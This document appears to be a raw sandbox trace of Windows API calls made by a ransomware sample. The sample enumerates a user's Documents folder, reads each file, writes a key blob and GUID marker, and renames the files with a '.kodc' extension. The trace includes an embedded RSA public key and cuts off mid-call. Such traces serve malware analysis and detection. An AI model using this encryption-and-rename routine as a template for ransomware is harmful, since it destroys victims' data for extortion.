[0097.989] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.989] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.989] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.989] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.989] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.989] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.990] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.990] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.990] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.990] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.990] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.990] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.990] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.990] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.990] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.990] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.990] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.990] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0097.990] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0097.990] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x33402f0 [0097.990] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.990] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0097.990] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317100 [0097.990] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0097.990] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0097.990] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33402f0 | out: hHeap=0x630000) returned 1 [0097.990] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0097.990] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0097.990] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.991] PathFindFileNameW (pszPath="") returned="" [0097.991] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.991] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9fd3f350, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x9fd3f350, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0097.991] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.991] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9fd3f350, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x9fd3f350, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0097.991] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85bf09d0, ftCreationTime.dwHighDateTime=0x1d57111, ftLastAccessTime.dwLowDateTime=0x9ce02d20, ftLastAccessTime.dwHighDateTime=0x1d5bf94, ftLastWriteTime.dwLowDateTime=0x9ce02d20, ftLastWriteTime.dwHighDateTime=0x1d5bf94, nFileSizeHigh=0x0, nFileSizeLow=0xed4c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="48Qgvj76f-A.pptx", cAlternateFileName="48QGVJ~1.PPT")) returned 1 [0097.991] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.991] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e7c0 [0097.991] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.991] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\48Qgvj76f-A.pptx") returned=".pptx" [0097.991] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\48Qgvj76f-A.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\48qgvj76f-a.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0097.991] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=60748) returned 1 [0097.991] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0097.996] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xed26, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.996] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0097.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0097.997] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.997] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.997] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0xed4c, lpOverlapped=0x0) returned 1 [0097.998] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0097.998] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.998] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.998] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0097.999] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0097.999] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.999] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0097.999] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0097.999] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0097.999] GetLastError () returned 0x0 [0098.000] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0098.000] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0098.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.000] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0098.000] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0098.000] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.000] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0098.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.000] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.000] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xed50) returned 0x9ba4d90 [0098.001] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.001] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.001] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0098.001] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0098.002] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xed4c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.002] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0098.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0098.002] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.002] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0098.002] CloseHandle (hObject=0x5cc) returned 1 [0098.004] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\48Qgvj76f-A.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\48qgvj76f-a.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\48Qgvj76f-A.pptx.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\48qgvj76f-a.pptx.kodc")) returned 1 [0098.005] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0098.005] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.005] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.007] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0098.007] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118db3d0, ftCreationTime.dwHighDateTime=0x1d5c310, ftLastAccessTime.dwLowDateTime=0xbf911ec0, ftLastAccessTime.dwHighDateTime=0x1d5ba70, ftLastWriteTime.dwLowDateTime=0xbf911ec0, ftLastWriteTime.dwHighDateTime=0x1d5ba70, nFileSizeHigh=0x0, nFileSizeLow=0x10478, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5dx_mGakYFnEcnVitJ.pptx", cAlternateFileName="5DX_MG~1.PPT")) returned 1 [0098.007] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5dx_mGakYFnEcnVitJ.pptx") returned=".pptx" [0098.007] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5dx_mGakYFnEcnVitJ.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5dx_mgakyfnecnvitj.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0098.007] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=66680) returned 1 [0098.008] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0098.012] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x10452, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.012] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0098.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.013] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.013] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x10478, lpOverlapped=0x0) returned 1 [0098.013] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0098.013] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.013] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.013] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0098.014] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0098.014] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.014] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0098.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0098.014] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0098.014] GetLastError () returned 0x0 [0098.015] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0098.015] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0098.015] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.015] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0098.015] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0098.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.015] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0098.015] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10480) returned 0x9ba4d90 [0098.015] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.015] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0098.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0098.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0098.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x3340338 [0098.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a7c0 [0098.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x3340380 [0098.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a7d8 [0098.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a808 [0098.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a820 [0098.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0098.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0098.016] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0098.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0098.017] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x10478, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.017] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0098.017] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.017] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0098.017] CloseHandle (hObject=0x5cc) returned 1 [0098.019] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.019] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x32d0db8 [0098.019] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5dx_mGakYFnEcnVitJ.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5dx_mgakyfnecnvitj.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5dx_mGakYFnEcnVitJ.pptx.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5dx_mgakyfnecnvitj.pptx.kodc")) returned 1 [0098.021] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16bb1fb0, ftCreationTime.dwHighDateTime=0x1d5bdb5, ftLastAccessTime.dwLowDateTime=0x805b0be0, ftLastAccessTime.dwHighDateTime=0x1d5b8cb, ftLastWriteTime.dwLowDateTime=0x805b0be0, ftLastWriteTime.dwHighDateTime=0x1d5b8cb, nFileSizeHigh=0x0, nFileSizeLow=0x18abd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5yCEZc_6.csv", cAlternateFileName="")) returned 1 [0098.021] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0098.021] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e7c0 [0098.021] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5yCEZc_6.csv") returned=".csv" [0098.021] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5yCEZc_6.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5ycezc_6.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0098.021] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=101053) returned 1 [0098.021] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0098.025] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x18a97, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.025] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0098.026] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.026] HeapFree (in: hHeap=0x630000, dwFlags=0x0, 